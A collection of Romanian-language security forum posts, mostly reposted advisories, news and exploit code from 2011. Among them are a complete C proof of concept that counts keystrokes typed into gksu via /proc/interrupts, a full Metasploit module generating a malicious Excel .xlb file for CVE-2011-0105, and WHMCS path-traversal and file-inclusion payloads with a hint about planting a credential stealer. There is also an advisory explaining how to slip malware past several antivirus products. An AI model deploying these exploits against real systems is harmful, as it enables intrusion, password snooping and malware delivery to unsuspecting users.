Nytro

De ce sa fim filati? Pentru ca "x" gasesti un SQLI in site-ul lui "y"? Cui ii pasa ca cineva a facut deface la rGaming.ro in afara proprietarului acestui site? O sa vina politia sa il caute pe cel care a facut-o? De ce ar face asta? Nu inteleg aceasta paranoia, sa gasesti un SQLI nu e deloc complicat, sunt zeci de mii de persoane care o pot face, deci daca gasesti unul si faci cine stie ce, nu esti tocmai un "badass", un pericol public, un urmarit general al politiei. Zic SQLInjection pentru ca in ziua de azi la asta s-a ajuns: cine stie SQLI, sparge un site de cacat, gata, e hacker in ochii presei, in ochii tuturor. La fel si ratatii de la lulzec si Anonymous, cica "hackeri"... Dar cei care au scris, de placere practic, mii de linii de cod la kernelul de Linux care e gratuit ce sunt? HD Moore care ofera metasploit gratis (bine, inainte de Rapid7) ce e? Muts (Mati Ahroni) si Backtrack-ul, fyodor si n_map...? Si exemplele pot continua. Si da, sunt persoane publice, cunoscute de milioane de oameni poate si uite ca nu sunt la puscarie si nu le e frica de asta. Dar lui "1337Hax0r" de pe RST care a gasit SQLI in www.nea-gigi.hostgratis.com.ro.plm ii e frica... E absurd. Te poate cauta politia pentru: - SQL Injection - daca gasesti la banci, paypal si poate extragi ceva date, sau la diverse companii guvernamentale care au informatii confidentiale in baza de date - Phishing sau Scam - adica pentru tentativa de furt informational. Nu, nu pentru phishing la Yahoo ca vrei parola prietenei, ci pentru phishing la banci - Carding - imparti diverse informatii legate de conturi bancare care nu iti apartin Cam astea ar fi ideile. Daca ar fi sa facem o analogie cu RST, NU aveti voie cu astfel de rahaturi aici, acele rahaturi nu va fac hackeri ci HOTI. E o mare diferenta, foarte putin inteleasa de publicul general.

Super. Ma intreb cine a descoperit asta, daca exista un POC, daca se poate exploata, sau daca a fost folosita pe o scara larga...

Microsoft Visual Studio 11 Developer Preview Visual Studio 11 Developer Preview is an integrated development environment that seamlessly spans the entire life cycle of software creation, including architecture, user interface design, code creation, code insight and analysis, code deployment, testing, and validation. Overview Visual Studio 11 Developer Preview is an integrated development environment that seamlessly spans the entire life cycle of software creation, including architecture, user interface design, code creation, code insight and analysis, code deployment, testing, and validation. This release adds support for the most advanced Microsoft platforms, including the next version of Windows (code-named "Windows 8") and Windows Azure, and enables you to target platforms across devices, services, and the cloud. Integration with Team Foundation Server allows the entire team, from the customer to the developer, to build scalable and high-quality applications to exacting standards and requirements. Visual Studio 11 Developer Preview is prerelease software and should not be used in production scenarios. This preview enables you to test updates and improvements made since Visual Studio 2010, including the following: Support for the most advanced platforms from Microsoft, including Windows 8 and Windows Azure, as well as a host of language enhancements. New features such as code clone detection, code review workflow, enhanced unit testing, lightweight requirements, production IntelliTrace exploratory testing, and fast context switching. This preview can be installed to run side by side with an existing Visual Studio 2010 installation. The preview provides an opportunity for developers to use the software and provide feedback before the final release. To provide feedback, please visit the Microsoft Connect website. The .NET Framework 4.5 Developer Preview is also installed as part of Visual Studio 11 Developer Preview. Note: This prerelease software will expire on June 30, 2012. To continue using Visual Studio 11 after that date, you will have to install a later version of the software. In order to develop Metro style applications, the Visual Studio 11 Developer Preview must be installed on the Windows Developer Preview with developer tools English, 64-bit. Developing Metro style applications on other Preview versions of Windows 8 is not supported. Download: http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=27543

E vechi, nu mai e functional probabil...

Voi nu intelegeti urmatoarele lucruri: 1) NU e nicio placere sa dai ban cuiva, sau avertisment, e doar putin timp pierdut pentru a mentine ordinea pe forum. 2) NU se dau avertismente sau banuri fara motiv. Noi frecventam forumul si in general stim membrii forumului, stim cat au contribuit la forum si luam decizii in functie de posturile persoanei respective. De exemplu, pentru mine conteaza foarte mult posturile utile (tehnice) ale membrilor si sunt indulgent cu persoanele care contribuie la forum. 3) NU avem nimic de castigat din faptul ca suntem moderatori, eu fac asta pentru ca imi place RST si vreau sa fie "curat", dar nu castig nimic daca ii dau warn/ban lui Vasile pentru ca l-a injurat pe Gheorghe. Legat de acest topic, e util dar discutabil. In general nu se dau banuri decat daca e strict necesar, se dau avertismente de obicei. Daca aveti o problema cu cineva care va da avertisment, discutati cu moderatorul respectiv pe PM. Nu se rezolva, discutati cu mine sau cu un alt administrator. Si eu am dat un avertisment, si dupa o scurta conversatie pe PM mi-am dat seama ca am gresit si am retras acel avertisment.

Unul singur e de ajuns: http://twitter.com/#!/poyovl/following Am adaugat la Follow numai persoane din "domeniu". Pune-i pe toti la Follow.

A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1 /* * A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1. * * The file /proc/interrupts is world readable. It contains information * about how many interrupts were emitted since the system boot. We may loop * on one CPU core while the victim is executed on another, and learn the length * of victim's passord via monitoring emitted interrupts' counters of the keyboard * interrupt. The PoC counts only keystrokes number, but it can be easily extended * to note the delays between the keystrokes and do the statistical analysis to * learn the precise input characters. * * The limitations: * - it works on 2-core CPUs only. * - it works on 1-keyboard systems only. * - it doesn't carefully count the first and last keystrokes (e.g. ENTER after * the password input). * - it doesn't carefully filter keystrokes after ENTER. * * by segoon from Openwall * * run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu * * P.S. The harm of 0444 /proc/interrupts is known for a long time, but I * was told about this specific attack vector by Tavis Ormandy just after similar * PoC spy-sched was published. */ #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <fcntl.h> #include <err.h> #include <errno.h> #include <string.h> int i8042_number; int ints[1024], ints_prev[1024], ints_delta[1024]; char buffer[1024]; int reread_ints(int *interrupts, int int_count, char **names) { int i; int n, c1, c2; char s1[1024], s2[1024]; int interrupts_fd; FILE *interrupts_file; interrupts_fd = open("/proc/interrupts", O_RDONLY); if (interrupts_fd == -1) err(1, "open(\"/proc/interrupts\")"); interrupts_file = fdopen(interrupts_fd, "r"); if (interrupts_file == NULL) err(1, "fdopen"); if (fseek(interrupts_file, 0, SEEK_SET) < 0) err(1, "lseek"); fgets(buffer, sizeof(buffer), interrupts_file); for (i = 0; i < int_count; i++) { if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) { fclose(interrupts_file); return i; } if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) { fclose(interrupts_file); return i; } if (names != NULL && names[i] == NULL) names[i] = strdup(s2); interrupts[i] = c1 + c2; } fclose(interrupts_file); return int_count; } void init_i8042_number(void) { int i; int can_be_keyboard[1024]; char *names[1024]; int number_of_interrups, can_be_keyboard_numbers; number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names); /* * Identify the i8042 interrupt associated with the keyboard by: * 1) name should be i8042 * 2) interrupts count emitted in one second shouldn't be more than 100 */ for (i = 0; i < number_of_interrups; i++) can_be_keyboard[i] = strcmp(names[i], "i8042") == 0; while (1) { sleep(1); reread_ints(ints, sizeof(ints), NULL); can_be_keyboard_numbers = 0; for (i = 0; i < number_of_interrups; i++) { can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100; if (can_be_keyboard[i]) can_be_keyboard_numbers++; ints_prev[i] = ints[i]; } if (can_be_keyboard_numbers == 1) { for (i = 0; i < number_of_interrups; i++) if (can_be_keyboard[i]) { i8042_number = i; printf("i8042 keyboard is #%d\n", i); return; } } } } int i8042_read(void) { reread_ints(ints, sizeof(ints), NULL); ints_prev[i8042_number] = ints[i8042_number]; return ints[i8042_number]; } int wait_for_program(char *pname) { FILE *f; int pid; char s[1024]; snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;" " sleep 0.1; done", pname); system(s); snprintf(s, sizeof(s), "pgrep %s", pname); f = popen(s, "r"); if (f == NULL) err(1, "popen"); if (fgets(buffer, sizeof(buffer), f) == NULL) err(1, "fgets"); if (sscanf(buffer, "%d", &pid) < 1) err(1, "sscanf"); pclose(f); return pid; } int main(int argc, char *argv[]) { int n, old, sum, i; int pid; char *pname = argv[1]; if (argc < 2) errx(1, "usage: spy-interrupts gksu"); puts("Waiting for mouse activity..."); init_i8042_number(); pid = wait_for_program(pname); printf("%s is %d\n", pname, pid); old = i8042_read(); sum = 0; while (1) { n = i8042_read(); if (old == n) usleep(10000); else { for (i = 0; i < n-old; i++) putchar('.'); fflush(stdout); } sum += n - old; old = n; if (kill(pid, 0) < 0 && errno == ESRCH) break; } /* * #interrupts == 2 * #keystrokes. * #keystrokes = len(password) - 1 because of ENTER after the password. */ printf("\n%d keystrokes\n", (sum-2)/2); return 0; } Sursa: /proc/interrupts PoC: spy-interrupts

Brazilian ISPs hit with massive DNS cache poisoning attacks Posted on 07 November 2011 A massive DNS cache poisoning attack attempting to infect users trying to access popular websites is currently under way in Brazil, warns Kaspersky Lab expert Fabio Assolini. "Brazil has some big ISPs. Official statistics suggest the country has 73 million computers connected to the Internet, and the major ISPs average 3 or 4 million customers each. If a cybercriminal can change the DNS cache in just one server, the number of potential victims is huge," he points out. And that is exactly what has been happening during last week. Users trying to reach Google, YouTube, Facebook and other popular global and local sites were being faced with pop-up windows telling them to install "Google Defence" and similar thematic software or Java applet in order to be able to access the wanted site: Unfortunately for those who fell for the trick, the offered software was a banking Trojan - for a long time now the preferred weapon of choice of Brazilian cyber crooks. According to Kaspersky, the same IP address hosted a number of malicious files and several exploits, and targeted users seem to be exclusively from Brazil. Among the different ways in which a DNS cache poisoning attack can be executed, the simplest option for the attackers is to pay an employee who has access to the DNS records to modify them so that user are redirected to the malicious site. And, as it seems, that is exactly what they did. Assolini notes that last week the Brazilian police has arrested an employee of an ISP located in the south of the country, and that he stands accused of changing his employer's DNS cache and redirecting users to phishing websites - no doubt at the behest of the people running them. "We strongly suspect similar security breaches will be happening in other small and medium ISPs in the country," Assolini commented. But random Internet users are not the only one who have been targeted by this type of attack. Employees of various companies have also been seeing similar pop-up windows when they tried to access any website. Once again, they were actually offered a banking Trojan for download. The attack was made possible by flaws in the networking equipment used by their companies. Routers and modems were accessed remotely by attackers who changed the devices' DNS configurations. Sursa: Brazilian ISPs hit with massive DNS cache poisoning attacks

Pff, nu am timp de grupuri. Vorbiti cu el, daca nu mai are timp, decideti voi, ceilalti din grup. PS: Nu trebuie sa fie neaparat un lider cat timp va intelegeti intre voi si nu apar probleme. O sa incerc sa imi fac ceva timp si pentru grupuri, dar chiar nu am cand momentan.

Hacking Embedded Devices For Fun And Profit Authored by prdelka These are slides from a talk called Hacking Embedded Devices for Fun and Profit. It uses Sky Broadband as a case study. HISTORY REPEATS ITSELF... - Typically run with no privilege separation - Everything runs as highest user privilege - SYSTEM / root (uid=0) on all processes - A single defect could potentially compromise the platform - Embedded Developers are not Security Conscious - Commonly write insecure routines - XSRF / XSS - Design & Logic bugs (e.g. Directory Traversal) - Buffer Overflow Defects - Small number of commonly re-used Libraries - Devices re-use open-source libraries across platforms - SNMP - UPnP - BusyBox - TinyHttpd, Micro_Httpd … etc Download: http://dl.packetstormsecurity.net/papers/attack/Hacking_Embedded_Devices-HackerFantastic.pdf Sursa: http://packetstormsecurity.org/files/106684

iSpy: Using Reflections To Spy On iPhones Rahul Raguram, Andrew M. White, Dibenyendu Goswami, Fabian Monrose and Jan-Michael Frahm Department of Computer Science, University of North Carolina at Chapel Hill Chapel Hill, North Carolina {rraguram,amw,dgoswami,fabian,jmf}@cs.unc.edu ABSTRACT We investigate the implications of the ubiquity of personal mobile devices and reveal new techniques for compromising the privacy of users typing on virtual keyboards. Speci- cally, we show that so-called compromising re ections (in, for example, a victim's sunglasses) of a device's screen are suficient to enable automated reconstruction, from video, of text typed on a virtual keyboard. Despite our deliberate use of low cost commodity video cameras, we are able to com- pensate for variables such as arbitrary camera and device positioning and motion through the application of advanced computer vision and machine learning techniques. Using footage captured in realistic environments (e.g., on a bus), we show that we are able to reconstruct uent translations of recorded data in almost all of the test cases, correcting users' typing mistakes at the same time. We believe these results highlight the importance of adjusting privacy expectations in response to emerging technologies. Download: http://dl.packetstormsecurity.net/papers/general/CCS2011.pdf Sursa: iSpy: Using Reflections To Spy On iPhones ? Packet Storm

Antivirus Software Bypass Authored by reset557 Various antivirus software on Windows fails to detect, block and/or move malware if the executable file has only execution permission and no read, write, or other bits set. Abstract: Some Windows antivirus software fails to detect, block and/or disinfect/move/delete malware if the malware EXE file has only execution permission and no read, write or other permissions. The worst cases are NOD32 and Avast antivirus, which allow the malware to run unimpeded. Avast has fixed the flaw while NOD32 is still vulnerable as of this writing. Vulnerable applications: (OS is Windows XP Professional SP3 with all current updates, unless otherwise noted) ESET NOD32 Antivirus 5.0.93.0, 5.0.94.0 and earlier 4.2.71.2 and earlier 4.0.x AVAST 6.0.1289 Internet Security , engine 111011-2 and earlier F-Prot Antivirus 6.0.9.5 , Scanning Engine 4.6.2 G-Data AntiVirus 2012 22.0.2.38, 22.0.9.1 Norman Security Suite, Antivirus version 8.00, Norman Scanner Engine version 6.07.11 and earlier Non-vulnerable applications: AVAST 6.0.1289 Internet Security , engine 111022-1 and later Sophos Endpoint Security and Control, version 9.5 Sophos Anti-Virus 9.5.5, Detection engine 3.23.2 MSE 2.1.1116.0 AVG Anti-Virus 2012.0.1831 Avira Antivirus Premium 2012 (12.0.0.867) BitDefender Antivirus Plus 2012 Build 15.0.31.1282 F-Secure Anti-Virus 2011 10.51 build 106 Kaspersky Anti-Virus 2012 12.0.0.374 McAfee AbtiVirus Plus 11.0 build 11.0.623 Panda Antivirus Pro 2012 Trend Micro Titanium 2012 5.0.1280 Vulnerability details: The Windows operating system supports a range of file permissions for files stored on volumes formatted in the NTFS file system format. For executing EXE files, the acting user account only needs the "Execute File" permission, while all others might be missing or denied, allthough there are cases when this is not true. The exact rule is unknown to the author. In the system used to test and verify the vulnerability the Execute File was enough to run programs. On another system running Windows 7 that was not true. Start of EXE files succeeded only if other permissions were enabled, including the Read Data permission. On another older system (XP or Windows 2003) the "Read Attributes" permission was required for program execution. The vulnerability discussed here is that some antivirus software fail to perform their functions if the malware file is missing read, write or delete permissions. They might not scan the file contents due to missing read permission, not delete it due to missing Delete permission or not desinfect it due to missing Write Data permission or not move to quarantine. For test Windows XP Professional SP3 (running in a virtual machine provided by Virtualbox v4.1.4) and the Back Orifice 2000 server file (bo2k.exe) ( BO2K - OpenSource Remote Administration Tool ) as a test file were used (with file permissions set to only allow execution). ESET NOD32 Eset NOD32 does nothing when a sample of the Back Orifice 2000 server EXE file with only the Execute File permission is executed. The bo2k.exe file is executed, the process works unrestrained and there is no action from by NOD32. If the same file with full permissions is started, NOD32 report it as malware, blocks the execution and deletes the file. AVAST AVAST 6.0.1289 Internet Security Trial version, engine 111011-2 On start of the test file it claims the file was blocked and moved to chest (quarantine), but actually it is executed and works (and not moved). A malware file with full permissions is prevented execution and is moved to chest. The problem is resolved in the AVAST engine version 111022-1 and later. F-Prot F-Prot Antivirus 6.0.9.5 , Scanning Engine 4.6.2 Prevents execution of the test file, but can not delete it. (tries, but fails - regular malware file is deleted) On demand scan completelly ignores test files (does not report them as malware). G-Data G-Data AntiVirus 2012 22.0.9.1 Prevents execution of the test file, tries to move it to quarantine, but fails with no error message. If the user selects the non-default option to delete the file, that works. Norman Norman Security Suite, Antivirus version 8.00, Norman Scanner Engine version 6.07.11 Does not seem to recognize BO2k server as a threat. Tested with the bo2k GUI executable: Prevents execution, claims to move to quarantine, but file stays where it was. The Engine version 6.07.13 does not recognize neither the BO2K GUI or server as malware, so it was not tested. Attack scenarios Possible attack scenarios are (for NOD32 and unfixed AVAST): - malware infects the system before antivirus software is installed After the infection the malware removes all permissions except "Execute File" from its EXE file, making itself undetectable by vulnerable antivirus software that is installed later. - malware spreads on NTFS formatted USB flash drives Malware infects or creates EXE files on USB flash drives and sets the permissions to execute-only. Plugging such a USB flash drive into other computers, the EXE files can be executed by the user or possibly automatically (Windows AutoPlay functionality) undetected by vulnerable antivirus software installed on the target system. It is also possible to infect further USB flash drives and other media in the presence of vulnerable antivirus software (see next item). - download of malware Even in presence of vulnerable antivirus software, it is possible to download and save an EXE file to the system that would otherwise be detected as malware and blocked. A successfully tested scenario (with NOD32) is: - create an empty target file - remove all permission from it, except to write/append data - download a ZIP file containg an EXE file that is detected as malware (the bo2k.exe from the download package on the BO2K home page); the ZIP file triggers no warnings from NOD32 - using standard command line tools, like unzip, split and cat, extract the bo2k.exe file from the ZIP archive in small parts (like 100 bytes), then append the parts in correct order to the target file in separate write operations Not using an .EXE ending in the created file names might heighten the probability of success. The result is a fully functioning copy of the bo2k.exe file. In the above scenario NOD32 complained about detected malware, but the file was not (re)moved and could be executed without any interference from NOD32. Solution/workaround Use software listed as not vulnerable above. Vendor communication ESET 2011 Aug 7 - ESET is informed about the issue 2011 Aug 8 - ESET replies the information was passed on 2011 Oct 18 - ESET confirms the issue is under investigation (forum post, see Serious bug reporting - Wilders Security Forums ) 2011 Nov 5 - Issue published on Bugtraq AVAST 2011 Oct 11-17 - vendor was informed 2011 Oct 23 - fixed version of software is released F-Prot, G-Data, Norman They were informed about the issues in October 11th or 12th. As the issue with their products is minor, I did not wait for a solution from their side. Regards, reset557 Txt: http://dl.packetstormsecurity.net/1111-advisories/malware-bypass.txt Sursa: Antivirus Software Bypass ? Packet Storm

Da, ban permanent, thanks.

Da, ban permanent, thanks.

WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities $b0x# WHMCS ( WHMCompleteSolution ) 3.x / 4.x Multiple Vulnerability ! $b0x# ZxH-Labs $b0x# 1st-NOV-11 $b0x# Www.Sec4ever.coM $b0x# WH-03 On Windows IIS 6.0 ======================================================== b0x@1337b0x:/b0x/Exploits/WebAPP# whoami ZxH-Labs | Www.Sec4ever.coM b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL EXPL Type : Local File Disclosure Files : Submitticket.php , Downloads.php -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00 EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00 ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00 EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00 b0x@1337b0x:/b0x/Exploits/WebAPP# b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.bug Bug TYPE : Local File Include Bug File : Reports.php -I : reports.php?report=[LFI]%00 EX : admin/reports.php?report=../../../../../../../boot.ini%00 You Can Use This Bug When You Get Forbidden Access In Lux Symlink ! However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00 And Don't Forget To Use IFRAME With Evil Code'z b0x@1337b0x:/b0x/Exploits/WebAPP# Logout ======================================================== $b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever | TNT_HACKER | r1z | Tw1st3r | S4S Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN | Th3MMA | FreeMan(LY) | Ma3stro_DZ Mr.L4iv3 And All Q8'z ./b0x Sursa: WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities

MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow Posted Nov 6, 2011 Authored by Abysssec, sinn3r, Aniway, juan vazquez | Site metasploit.com This Metasploit module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack-based buffer overflow. This results in arbitrary code execution under the context of the user. ## # $Id: ms11_021_xlb_bof.rb 14172 2011-11-06 20:16:34Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info={}) super(update_info(info, 'Name' => "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- based buffer overflow. This results aribrary code execution under the context of user the user. }, 'License' => MSF_LICENSE, 'Version' => "$Revision: 14172 $", 'Author' => [ 'Aniway', #Initial discovery (via ZDI) 'abysssec', #RCA, poc 'sinn3r', #Metasploit 'juan vazquez' #Metasploit ], 'References' => [ ['CVE', '2011-0105'], ['MSB', 'MS11-021'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-121/'], ['URL', 'http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/'] ], 'Payload' => { 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'ExitFunction' => "process", 'DisablePayloadHandler' => 'true', 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # Win XP SP3 (Vista and 7 will try to repair the file) ['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007) ['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel ], 'Privileged' => false, 'DisclosureDate' => "Aug 9 2011", 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The filename', 'msf.xlb']) ], self.class) end def exploit path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-0105.xlb') f = File.open(path, 'rb') template = f.read f.close p = payload.encoded # Offset 1556 record = '' record << "\xa7\x00" #record type record << "\x04\x00" #record length if target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2 record << "\xb0\x0d\x0c\x00" #data else record << "\xb0\x0f\x0c\x00" #data end # Offset 1564 continue_record = '' continue_record << "\x3c\x00" #record type continue_record << [p.length+32].pack('v') #length buf = '' buf << template[0, 1556] buf << record buf << continue_record buf << rand_text_alpha(1) buf << [target.ret].pack('V*') buf << "\x00"*12 buf << p buf << template[2336, template.length] file_create(buf) end end =begin 0:000> r eax=41414141 ebx=00000000 ecx=00000006 edx=008c1504 esi=0000007f edi=00000005 eip=301a263d esp=00137ef8 ebp=00137f6c iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 EXCEL!Ordinal40+0x1a263d: 301a263d 8908 mov dword ptr [eax],ecx ds:0023:41414141=???????? 0:000> dc esp 00137ef8 00000000 00000000 41414141 41414141 ........AAAAAAAA 00137f08 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 00137f18 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 00137f28 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 00137f38 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 00137f48 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA 00137f58 41414141 41414141 41414141 00000000 AAAAAAAAAAAA.... 00137f68 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA =end Sursa: MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow ? Packet Storm

Bytecode signatures for polymorphic malware Friday, November 4, 2011 About one year ago Alain presented the LLVM-based ClamAV bytecode. We've realised that, besides that initial introduction, we've never shown any real life use case, nor did we ever demonstrate the incredible power and flexibility of the ClamAV bytecode engine. I'll try to fix that today. I decided to target the Xpaj virus because it's an polymorphic file infector, which means that it is not easily to detected with plain signatures. Please note that I'm just focusing on the detection of Xpaj via bytecode signatures, not on Xpaj itself which was already thoroughly reviewed and explained. Pic.1: Clean file Pic.2: Same file as above, but infected with Xpaj For the scope of this blog post, it suffices to say that Xpaj is a file infector targeting 32-bit Windows executables and DLLs which employs entry-point obfuscation (EPO) capabilities in order to make the detection harder. In particular, the virus code hijacks a few API calls in the .text section of the file, diverting them to its own routine. This routine is located within the .text section and consists of a series of small chunks of code connected by jumps. Most of that is “garbage”. The only thing this preliminary block of code does is compute the code address for the next stage and jump to it. The actual viral code, as well as the overwritten blocks, are stored, in encrypted form, inside the data section. Well... enough technical info already. From now on I'll just focus on the Xpaj detection, or rather, the detection of a rather simplified version of it in order to keep this blog post small and readable. The geeks can find the full source code here. Let's start with a look at the virus entry point code: push ebp mov ebp, esp sub esp, XX While these are technically enough bytes to create a signature based on the opcodes, such a signature would be a really bad idea. What we have there, in fact, is just a pretty standard function entry point. After that we have some optional trash (do nothing) code, and then the virus saves the content of 3 random registers, which will be clobbered later by both the virus code and the trash engine too. So far we can still get away with a signature that makes use of a wildcard, however we still don't have much: stack allocation and 3 registers saved. That's still not enough. Next, we've got the trash engine in all its glory, and eventually we reach a function call. The trash code may or may not jump to another chunk of code. And that effectively kills our ability to use a normal (ndb or ldb) signature. Not all is lost, though. We can still write a small piece of bytecode signature which follows the code through the trash and checks for specific fingerprints. In particular we plan to scan the code section for something that looks like the following: mov edi, edi push ebp mov ebp, esp sub esp, $STACKSIZE [optional trash] push eax push edx push edi note, the registers are chosen randomly among the 32 bit general purpose registers except esp and ebp [optional trash] call $DELTA Here we are inside "$DELTA".. [optional trash] mov register, [ebp-stacksize] [optional trash] ret Back outside the call we have a couple of other less interesting fingerprints and eventually the virus will jump to some runtime computed location. There are two ways by which this is achieved: jmp local_var or push local_var ret Ok let's code... First we look for the 5 static bytes at the virus entry point (EP): seek(begin_of_the_code_section, SEEK_SET); cur = file_find_limit("\x55\x89\xe5\x83\xec", 5, end_of_the_code_section); if(cur < 0) return 0; Then we set ourselves in a disassembly loop and we check if we got what we expect. Something along the lines of: while(1) { struct DIS_fixed d; int next = DisassembleAt(&d, cur, space_remaining); if(next == -1) break; /* disasm error */ cur = next; /* cur now points at the next op */ [here we check the op] } As for the actual opcode matching, here are a few examples. The first thing we are interested in is the 3 pushes. In terms of bytecode we need to check that: 1. the opcode is OP_PUSH 2. the argument is a register 3. the register is one of (eax, ebx, ecx, edx, esi, edi) In BC that'd be: d.x86_opcode == OP_PUSH d.arg[0].access_type == ACCESS_REG d.arg[0].u.reg == REG_EAX || d.arg[0].u.reg == REG_ECX || d.arg[0].u.reg == REG_EDX || d.arg[0].u.reg == REG_EBX || d.arg[0].u.reg == REG_ESI || d.arg[0].u.reg == REG_EDI Altogether: if(d.x86_opcode == OP_PUSH && d.arg[0].access_type == ACCESS_REG && (d.arg[0].u.reg == REG_EAX || d.arg[0].u.reg == REG_ECX || d.arg[0].u.reg == REG_EDX || d.arg[0].u.reg == REG_EBX || d.arg[0].u.reg == REG_ESI || d.arg[0].u.reg == REG_EDI)) Then we need to check for the call $DELTA. In other words we check that: 1. the opcode is a call i.e.: d.x86_opcode == OP_CALL 2. the argument is an immediate relative value i.e.: d.arg[0].access_type == ACCESS_REL Then we pick the call target and we "jump" to it, not before saving the return address: int32_t target_address, return_address; seek(cur-4, SEEK_SET); /* we position onto the call argument */ read(&target_address, sizeof(target_address)); /* we read the relative jump value */ target_address = le32_to_host(target_address); /* we handle big endian machines */ retaddr = cur; /* we save the address to return to */ target_address = cur + target_address; /* we compute the addres to jump to */ Another interesting example is the trash code parser. There can be 3 types or trash ops: A. Arithmetic or logic operation on a stack allocated DWORD based on an immediate or register value. Eg: mov [ebp-xx], immed add [ebp-xx], register B. Arithmetic or logic operation on a 32bit register based on a stack allocated DWORD or an immediate value. Eg: mov register, [ebp-xx] sub register, other_register C. A jump to the next chunk of code.Eg: jmp next_chunk More in details, for case A we check that: 1. d.x86_opcode is one of (OP_ADD, OP_ADC, OP_AND, OP_MOV, OP_OR, OP_SBB, OP_SUB, OP_XOR), i.e.: d.x86_opcode == OP_ADD || d.x86_opcode == OP_ADC || d.x86_opcode == OP_AND || d.x86_opcode == OP_MOV || d.x86_opcode == OP_OR || d.x86_opcode == OP_SBB || d.x86_opcode == OP_SUB || d.x86_opcode == OP_XOR 2. the dest argument is a mem region: d.arg[0].access_type == ACCESS_MEM 3. the access size is a DWORD: d.arg[0].u.mem.access_size == SIZED 4. the dest argument is in the form [ebx-displacement]: d.arg[0].u.mem.scale_reg == REG_EBP && d.arg[0].u.mem.scale == 1 && d.arg[0].u.mem.add_reg == REG_INVALID 5. the displacement fits within the local funcion stack: d.arg[0].u.mem.displacement <= -4 && d.arg[0].u.mem.displacement >= -(int32_t)stacksize 6. the source argument can be anything (i.e. a register or an immediate value): nothing to check! Case B is very similar, except the arguments are reversed: 1. The dest argument is a register: d.arg[0].access_type == ACCESS_REG 2a. The src arg is either another reg: d.arg[1].access_type == ACCESS_REG 2b. Or it is an immediate: d.arg[1].access_type == ACCESS_IMM 2c. Or it is a stack based DWORD: d.arg[0].access_type == ACCESS_MEM && d.arg[0].u.mem.access_size == SIZED && d.arg[0].u.mem.scale_reg == REG_EBP && d.arg[0].u.mem.scale == 1 && d.arg[0].u.mem.add_reg == REG_INVALID && d.arg[0].u.mem.displacement <= -4 && d.arg[0].u.mem.displacement >= -(int32_t)stacksize Finally, case C... Here we: 1. Check that the op is a jmp: d.x86_opcode == OP_JMP 2. Check that it's got an immediate argument: d.arg[0].access_type == ACCESS_REL 3. Then we can "jump" to the next position: int32_t rel; seek(cur-4, SEEK_SET); /* move onto the jmp argument */ read(&rel, sizeof(rel)); /* read it */ rel = le32_to_host(rel); /* make it big endian safe */ cur += rel; /* "jump" to it */ Blog post by Alberto Wu. Sursa: http://blog.clamav.net/2011/11/bytecode-signatures-for-polymorphic.html

Wordpress Xss + Internet Explorer 8 Exploit Fri 04 Nov 2011 Description: Wordpress 3.0.3 comment xss. This video shows you how it can be easy for everyone to craft an evil comment to redirect the victim to a server where there is an exploit for Internet Explorer 8 (CVE-2010-3971). Video: http://www.securitytube.net/video/2413 http://www.youtube.com/watch?v=BXmXEKfxZQc&feature=player_embedded#!

